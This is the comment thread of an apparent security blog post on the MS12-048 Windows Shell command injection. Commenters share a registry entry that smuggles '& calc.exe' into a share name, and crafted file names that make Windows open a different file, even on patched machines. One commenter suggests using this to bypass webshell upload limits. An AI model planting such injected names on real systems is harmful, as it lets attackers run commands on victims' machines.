« toStaticHTML: The Second Encounter (CVE-2012-1858) | Main | Android DNS Poisoning: Randomness gone bad (CVE-2012-2808) »

July 16, 2012

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835130c5153ef0177433d7e68970d

Listed below are links to weblogs that reference Microsoft Windows Shell Command Injection - MS12-048 (CVE-2012-0175):

Comments

丸子

good post,and this might be an good idea to bypass some limitation of webshell uploading

ct

nice one

jp

Windows does support this behavior if you set the value via a registry key re:


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\LanmanServer\Shares]
"for \"xxx & calc.exe"=hex(7):43,00,53,00,43,00,46,00,6c,00,61,00,67,00,73,00,\
3d,00,30,00,00,00,4d,00,61,00,78,00,55,00,73,00,65,00,73,00,3d,00,34,00,32,\
00,39,00,34,00,39,00,36,00,37,00,32,00,39,00,35,00,00,00,50,00,61,00,74,00,\
68,00,3d,00,43,00,3a,00,5c,00,54,00,65,00,73,00,74,00,00,00,50,00,65,00,72,\
00,6d,00,69,00,73,00,73,00,69,00,6f,00,6e,00,73,00,3d,00,30,00,00,00,52,00,\
65,00,6d,00,61,00,72,00,6b,00,3d,00,00,00,53,00,68,00,61,00,72,00,65,00,4e,\
00,61,00,6d,00,65,00,3d,00,66,00,6f,00,72,00,20,00,22,00,78,00,78,00,78,00,\
20,00,26,00,20,00,63,00,61,00,6c,00,63,00,2e,00,65,00,78,00,65,00,00,00,54,\
00,79,00,70,00,65,00,3d,00,30,00,00,00,00,00

Adi Cohen

Very nice, I suspected this could be possible but haven't got around to it. thanks for sharing

Nick

You might be able to add
"mangled names = no"
to your smb.conf. That should prevent what you have in figure 2.

Adi Cohen

Hi Nick,
That's a great catch.

This could allow for a file with the following name to exist:
a/a.txt" .html

When a user double-click this file, the registered application will get access to a file named 'a.txt' under a folder named 'a'.
The attached image shows this scenario.
http://img821.imageshack.us/img821/8010/36262549.png


Updated machines will not accept a file whose name contains a double-quote sign.
Therefore breaking out of the string surrounding the path in order to add arguments or just truncate the path string itself (used in the example above) will not work.
However, it is possible to use the following file name:
a/a.html

To produce a case where patched systems will still open the file 'a.html' under the folder 'a' instead of the real file.

Verify your Comment

Previewing your Comment

This is only a preview. Your comment has not yet been posted.

Working...
Your comment could not be posted. Error type:
Your comment has been posted. Post another comment

The letters and numbers you entered did not match the image. Please try again.

As a final step before posting your comment, enter the letters and numbers you see in the image below. This prevents automated programs from posting comments.

Having trouble reading this image? View an alternate.

Working...

Post a comment

Follow us on Twitter

AppScan Free Trial


Try IBM Security AppScan software at no charge.

Become a Fan